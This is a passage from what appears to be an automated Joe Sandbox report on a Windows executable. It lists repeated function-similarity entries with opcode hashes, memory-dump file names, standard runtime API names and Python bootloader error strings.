                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB41A03391824187EB34DA1AA64037973A1FB57B44F14A235DB8EC36D1EF2EE403E656
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45cbf319011325d152ea5d33328b86b50450e3545a6e24c2fae8e008c495f9c5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f9e3c96a5797843a3111a6a943180d46ed56b3a5545561903a45cfe990cbf7d7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45cbf319011325d152ea5d33328b86b50450e3545a6e24c2fae8e008c495f9c5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7721F823B0925157FB149B1264493FA7641BF46BD4F886030EE0C87782DEBEE023D30A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 961caa17a55a11a81e35544db86fd8d305fd4dbcc9926c30bc90759cc3c3270e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F731D963E1862281F711AB65844137C3650AF42B90F51A235EA6EC73D3EF7EE443A71B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 61956434cb0f7bcd6a04adc5da1cdb075a302deac477d700b1cf26cca08c8bb5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82116C63B0CA4141EF609F51940137E7250BF47B81F44E431EB8D9BA9AEF3ED552A706
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b0cc5ad17248a56a8366d80264f753a16ecc5eada51ac0379f181eacd56d44d4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A2104B3A08A4287DB208F18D44037A73A1EB85B95F245234EA9DC76D9DF3ED401DB05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bb6fc3b7706cf9c8fe1946782f7a0442383245d0a5ba1e7d01fc24dafb6813c5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50010C6260874241EB04EB6259012B97791FF47FE0F08A635EE5C87BE6DE7DD422A306
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7c333a99fba4dda6ed235fd9ad71b14b89c0951293f3aa710a4c32902dd498b8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B11BF33D1C64282F3109B04E44127973A9EB46740F45A539D6ADC77A2EF3EF812A70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6E1B4A8E6,?,?,?,00007FF6E1B49AA3,?,?,00000000,00007FF6E1B49D3E), ref: 00007FF6E1B4DDC5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b63b3e81b5b030dd6dedb752774ad01ea4d94aed212b429fc3f8b87a88a22141
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71F09642B2920741FF595B6198513B532855F5BB80F0CF031C98DD63D2FE1EE492621A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,?,?,00007FF6E1B3FE74,?,?,?,00007FF6E1B41386,?,?,?,?,?,00007FF6E1B42979), ref: 00007FF6E1B4CB3A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1fd5f16ab2c25fced8060817c0c2cb0c88c424356b6d65cb8540dbdda4c39537
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF05E42F0D24A45FF2457B1585137571804F4ABA0F48A730DD2ED52C2EE1EA442F11A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for 